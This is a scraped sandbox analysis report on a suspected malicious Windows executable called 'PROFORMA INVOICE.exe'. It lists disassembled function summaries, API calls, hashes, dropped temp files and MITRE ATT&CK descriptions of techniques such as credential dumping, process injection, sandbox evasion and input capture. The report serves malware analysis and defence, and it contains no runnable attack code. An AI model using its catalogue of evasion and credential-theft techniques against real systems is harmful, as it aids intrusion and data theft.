Opcode ID: 59dfe3e7b0fb7dd4223d10626d8a7c999928478891a4d448ef3f922492716a29
Instruction ID: 6243a33e424466287b114e05cfbc8a2142e8eff74d83e11ea8917b1a9f02ab21
Opcode Fuzzy Hash: 59dfe3e7b0fb7dd4223d10626d8a7c999928478891a4d448ef3f922492716a29
Instruction Fuzzy Hash: 32E02273A003282BDB20AAA59C09E87FBACBB55760F00001AF904DB041D674A64187D0

Function 00F9A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F9A63F

Part of subcall function 00F813F1: _doexit.LIBCMT ref: 00F813FB

Strings

AutoIt, xrefs: 00F9A633
Error allocating memory., xrefs: 00F9A638

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 409d3372ebbc440b782f01a6e810626ad358a7f63aaab793a7f13eb4766c18e2
Instruction ID: 31ed0199647161dc6b99a1ab32534c562f69427b1e4df170038c4c3e4524605a
Opcode Fuzzy Hash: 409d3372ebbc440b782f01a6e810626ad358a7f63aaab793a7f13eb4766c18e2
Instruction Fuzzy Hash: 85D05B313C435C33D21536A96C1BFD5764D9F15FA1F144016BB0C9A5D249DAD64072DA

Function 00FDAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00FDACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FDAEBD

Strings

WIN_XPe, xrefs: 00FDACD3

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 6b5219f143f5af57528e9575cc8447fe6b69d16f9829b48fdda103a1357cb357
Instruction ID: 21c90417a962f03cca48d3921695a7e806dbcb56f2a56418b9409fae6c70580a
Opcode Fuzzy Hash: 6b5219f143f5af57528e9575cc8447fe6b69d16f9829b48fdda103a1357cb357
Instruction Fuzzy Hash: 63E06D71C10149DFDB11DFA5DD84AECB7B9AB88311F188086E112B6660CB348A84FF26

Function 00FC86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FC86E2
PostMessageW.USER32(00000000), ref: 00FC86E9

Part of subcall function 00FA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FA7AD0

Strings

Shell_TrayWnd, xrefs: 00FC86DB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e54e67eb9fa714339498c2636891439b8cc8b26b6e2dc5634d1091d88ef8ed56
Instruction ID: 2d5eb61b3cb223ed2ec76e4d6410184742e3b7b58b475c8c5048f5036f3a30fa
Opcode Fuzzy Hash: e54e67eb9fa714339498c2636891439b8cc8b26b6e2dc5634d1091d88ef8ed56
Instruction Fuzzy Hash: A6D012723853587BF76477709C4BFC67A18AB05B21F110819B745EE1D0C9F8E940D755

Function 00FC8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FC86A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FC86B5

Part of subcall function 00FA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FA7AD0

Strings

Shell_TrayWnd, xrefs: 00FC869B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 632879a93afdf6278606886ec2b10dd387a3ee79d081e431cf6a03c7bafef0ea
Instruction ID: fc58be2495bd7d8e6c959f1e455a658ce4aee7071620874b75454efad17aad36
Opcode Fuzzy Hash: 632879a93afdf6278606886ec2b10dd387a3ee79d081e431cf6a03c7bafef0ea
Instruction Fuzzy Hash: A6D01272385358B7E76477709C5BFC67A18AB05B21F110819B749AE1D0C9F8E940D754

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PROFORMA INVOICE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\283026M3L

C:\Users\user\AppData\Local\Temp\Bactris

C:\Users\user\AppData\Local\Temp\autBAAF.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
PROFORMA INVOICE.exe

Function 00F8B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00F63D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 00F7DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 00F6406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00FAFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 00F63F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00FABFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00F63742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00F63E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 00F8ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Function 017DD240 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre